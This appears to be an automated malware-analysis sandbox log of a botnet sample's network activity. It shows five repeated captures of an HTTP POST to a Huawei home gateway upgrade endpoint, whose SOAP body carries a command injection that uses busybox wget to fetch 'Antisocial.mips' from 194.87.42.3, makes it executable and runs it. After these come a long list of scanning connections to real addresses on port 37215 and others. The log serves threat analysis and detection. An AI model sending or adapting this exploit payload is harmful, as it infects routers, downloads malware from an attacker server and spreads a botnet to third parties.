Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.164.30.159:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.240.211.158:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.79.193.5:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.50.71.156:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.131.179.126:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.242.158.111:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.108.55.243:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.202.220.8:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.33.200.202:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.162.167.74:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.188.170.72:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.28.48.242:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.182.186.10:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.94.135.41:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.165.152.55:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.182.255.48:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.8.170.178:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.136.61.104:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.23.193.61:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.221.98.221:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.44.192.41:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.142.142.86:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.141.164.240:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.59.55.108:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.206.57.92:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.131.178.152:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.206.93.219:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.222.170.204:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.42.8.171:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.9.201.133:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.251.253.61:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.16.99.101:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.82.143.222:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.212.17.133:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.250.96.26:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.183.7.135:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.247.22.71:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.51.200.209:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.153.58.252:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.222.183.254:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.216.3.113:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.212.28.103:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.246.116.86:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.125.40.72:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.227.254.179:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.216.59.204:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.67.116.109:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.44.62.206:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.54.3.127:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.148.202.67:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.239.178.77:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.244.21.84:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.88.51.58:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.100.72.139:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.207.218.5:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.88.30.209:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.145.154.255:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.147.132.221:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.90.160.63:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.200.106.38:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.244.7.35:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.76.96.231:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.206.43.243:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.175.8.86:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.5.153.156:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.193.195.75:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.19.132.255:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.67.163.200:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.80.180.177:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.48.132.6:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.113.52.66:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.15.78.67:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.127.87.89:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.69.208.6:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.175.81.42:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.214.179.53:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.222.121.155:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.105.117.122:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.57.0.236:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.241.175.75:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.128.217.168:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.133.254.240:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.103.223.149:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.172.85.47:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.229.43.26:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.108.226.164:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.193.190.168:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.104.220.184:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.200.50.216:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.194.227.236:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.191.46.225:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.205.89.180:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.111.183.0:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.244.69.200:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.12.217.88:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.91.142.227:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.233.16.94:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.160.35.92:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.173.105.131:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.156.115.63:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.195.238.17:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.180.14.181:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.0.136.34:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.129.177.19:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.227.165.201:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.208.253.95:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.2.10.117:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.246.134.254:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.202.5.198:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.89.60.3:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.126.189.207:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.234.120.237:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.90.216.242:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.215.215.219:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.141.34.202:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.72.82.231:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.98.228.216:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.237.236.150:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.138.93.233:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.251.54.85:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.254.96.196:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.112.93.112:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.165.56.238:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.41.101.6:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.200.146.221:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.106.204.111:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.24.90.183:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.230.201.126:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.156.234.8:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.114.55.167:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.187.88.17:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.138.114.22:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.154.167.25:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.36.132.72:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.43.153.199:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.73.28.132:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.222.96.246:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.80.250.81:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.195.71.109:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.138.185.141:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.233.246.237:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.220.111.62:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.38.14.110:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.31.247.13:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.64.28.247:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.134.126.87:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.132.163.227:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.121.135.27:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.102.183.77:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.17.229.111:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.71.201.83:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.170.181.82:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.77.225.167:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.219.21.140:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.254.197.182:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.221.219.80:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.223.24.38:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 197.185.73.119:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 156.108.190.123:37215
Source: global traffic TCP traffic: 192.168.2.23:58349 -> 41.159.103.134:37215
Source: global traffic TCP traffic: 192.168.2.23:34248 -> 194.87.42.3:5555
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.132.30.159:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.240.211.158:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.102.201.5:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.26.79.157:52869
